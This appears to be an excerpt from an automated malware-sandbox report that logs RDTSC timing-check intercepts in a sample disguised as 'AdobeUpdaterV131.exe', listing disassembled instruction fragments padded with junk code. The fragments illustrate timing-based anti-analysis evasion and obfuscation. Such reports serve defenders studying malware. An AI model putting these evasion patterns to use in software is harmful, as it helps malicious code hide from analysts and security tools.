Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9CD277 second address: 9CD27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9D1B35 second address: 9D1B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9D1B3F second address: 9D1B5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F09D0731CB6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9D19D3 second address: 9D19D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9D19D7 second address: 9D19F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F09D0731CAFh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9D19F3 second address: 9D1A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9CAFD1 second address: 9CAFD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9CAFD7 second address: 9CAFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9CAFDD second address: 9CAFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9CAFE1 second address: 9CAFF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jp 00007F09D0D9C3D6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9CAFF3 second address: 9CAFFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A05475 second address: A0547B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A0547B second address: A0549A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A0549A second address: A054A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A054A0 second address: A054A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A042E4 second address: A042EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A04443 second address: A04474 instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0731CA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jc 00007F09D0731CA6h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 push edx 0x00000021 jmp 00007F09D0731CABh 0x00000026 pop edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A0472C second address: A04733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A04733 second address: A04762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F09D0731CB2h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F09D0731CA8h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A04762 second address: A04785 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F09D0D9C3D6h 0x00000008 jmp 00007F09D0D9C3E9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A04785 second address: A0479E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CB5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A04D63 second address: A04D68 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: A09AC1 second address: A09ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F09D0731CA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E806F1 second address: 4E80704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E80704 second address: 4E80790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F09D0731CB1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F09D0731CAEh 0x00000015 mov ebp, esp 0x00000017 jmp 00007F09D0731CB0h 0x0000001c pop ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F09D0731CAEh 0x00000024 sub ecx, 7FA82498h 0x0000002a jmp 00007F09D0731CABh 0x0000002f popfd 0x00000030 pushad 0x00000031 jmp 00007F09D0731CB6h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E50DA1 second address: 4E50DA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E50DA7 second address: 4E50DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F09D0731CACh 0x00000009 add eax, 213840E8h 0x0000000f jmp 00007F09D0731CABh 0x00000014 popfd 0x00000015 movzx ecx, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov di, EE30h 0x00000023 mov edx, 77FCBD5Ch 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E50DDD second address: 4E50DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E50DF2 second address: 4E50E30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F09D0731CADh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F09D0731CACh 0x00000019 or cx, 38D8h 0x0000001e jmp 00007F09D0731CABh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 mov di, ax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E50E30 second address: 4E50E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E50E52 second address: 4E50E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E50E58 second address: 4E50E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC07D3 second address: 4EC07E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov cx, B715h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC07E4 second address: 4EC07EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC07EA second address: 4EC0839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d call 00007F09D0731CB9h 0x00000012 pop ecx 0x00000013 jmp 00007F09D0731CB1h 0x00000018 popad 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F09D0731CAFh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC0839 second address: 4EC0856 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC0856 second address: 4EC08A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F09D0731CB3h 0x00000013 adc ecx, 2DDE44FEh 0x00000019 jmp 00007F09D0731CB9h 0x0000001e popfd 0x0000001f movzx ecx, bx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E50ACB second address: 4E50B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d jmp 00007F09D0D9C3E2h 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 call 00007F09D0D9C3DEh 0x0000001b pushfd 0x0000001c jmp 00007F09D0D9C3E2h 0x00000021 adc ax, C958h 0x00000026 jmp 00007F09D0D9C3DBh 0x0000002b popfd 0x0000002c pop ecx 0x0000002d pushfd 0x0000002e jmp 00007F09D0D9C3E9h 0x00000033 add ecx, 0B079CF6h 0x00000039 jmp 00007F09D0D9C3E1h 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebp, esp 0x00000042 jmp 00007F09D0D9C3DEh 0x00000047 push dword ptr [ebp+04h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push edx 0x0000004e pop esi 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC055B second address: 4EC0597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007F09D0731CB2h 0x0000000c mov dword ptr [esp], ebp 0x0000000f jmp 00007F09D0731CB0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F09D0731CAAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC0597 second address: 4EC059B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC059B second address: 4EC05A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC05A1 second address: 4EC05B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC05B2 second address: 4EC05D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0731CADh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E90B19 second address: 4E90B29 instructions: 0x00000000 rdtsc 0x00000002 mov ah, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b movsx ebx, cx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E90B29 second address: 4E90B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E90B2E second address: 4E90B5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3DCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC062A second address: 4EC066E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CAFh 0x00000008 jmp 00007F09D0731CB8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F09D0731CADh 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC066E second address: 4EC068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3DAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC068E second address: 4EC069D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC069D second address: 4EC06A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC0BFE second address: 4EC0C7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F09D0731CACh 0x00000010 pushad 0x00000011 mov cx, DD57h 0x00000015 pushfd 0x00000016 jmp 00007F09D0731CACh 0x0000001b add ecx, 033181C8h 0x00000021 jmp 00007F09D0731CABh 0x00000026 popfd 0x00000027 popad 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007F09D0731CB6h 0x00000030 mov eax, dword ptr [ebp+08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F09D0731CB7h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC0C7F second address: 4EC0CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov edx, 67424446h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and dword ptr [eax], 00000000h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F09D0D9C3E9h 0x00000019 jmp 00007F09D0D9C3DBh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC0CB8 second address: 4EC0CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov ch, 21h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC0F24 second address: 4EC0F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC0F2A second address: 4EC0F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC0F2E second address: 4EC0F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E7077E second address: 4E707A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F09D0731CAAh 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F09D0731CAAh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E707A1 second address: 4E707B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E707B0 second address: 4E707D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F09D0731CAEh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bl, 4Dh 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0C20 second address: 4ED0C28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0C28 second address: 4ED0CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F09D0731CB4h 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F09D0731CB1h 0x00000015 or ax, 1896h 0x0000001a jmp 00007F09D0731CB1h 0x0000001f popfd 0x00000020 push eax 0x00000021 mov bx, DDD2h 0x00000025 pop edi 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 pushad 0x00000029 mov dx, si 0x0000002c mov esi, 3760B1F7h 0x00000031 popad 0x00000032 mov eax, dword ptr [76FB65FCh] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F09D0731CB9h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0CA1 second address: 4ED0CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F09D0D9C3DDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0CC7 second address: 4ED0D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0A42794930h 0x0000000f jmp 00007F09D0731CAEh 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 mov si, 356Dh 0x0000001b jmp 00007F09D0731CAAh 0x00000020 popad 0x00000021 xor eax, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F09D0731CB3h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0D1C second address: 4ED0D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0D39 second address: 4ED0D6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 7B18355Eh 0x00000014 call 00007F09D0731CAFh 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED019D second address: 4ED01A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED01A1 second address: 4ED01BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov dh, ECh 0x0000000b pushad 0x0000000c mov cx, 2E2Fh 0x00000010 mov ecx, 37D27E4Bh 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bh, ch 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED01BF second address: 4ED01D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 mov ecx, 06CC50E9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED01D3 second address: 4ED01EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0731CB7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E90056 second address: 4E900B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov di, 62FEh 0x00000011 pushfd 0x00000012 jmp 00007F09D0D9C3DFh 0x00000017 sub ch, FFFFFFAEh 0x0000001a jmp 00007F09D0D9C3E9h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 pushad 0x00000025 mov ax, AF09h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push esi 0x0000002d jmp 00007F09D0D9C3DBh 0x00000032 pop ecx 0x00000033 popad 0x00000034 and esp, FFFFFFF8h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E900B7 second address: 4E900BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E900BD second address: 4E9013E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F09D0D9C3E6h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F09D0D9C3E1h 0x00000017 and esi, 0E027956h 0x0000001d jmp 00007F09D0D9C3E1h 0x00000022 popfd 0x00000023 mov dx, ax 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 jmp 00007F09D0D9C3DAh 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F09D0D9C3E0h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
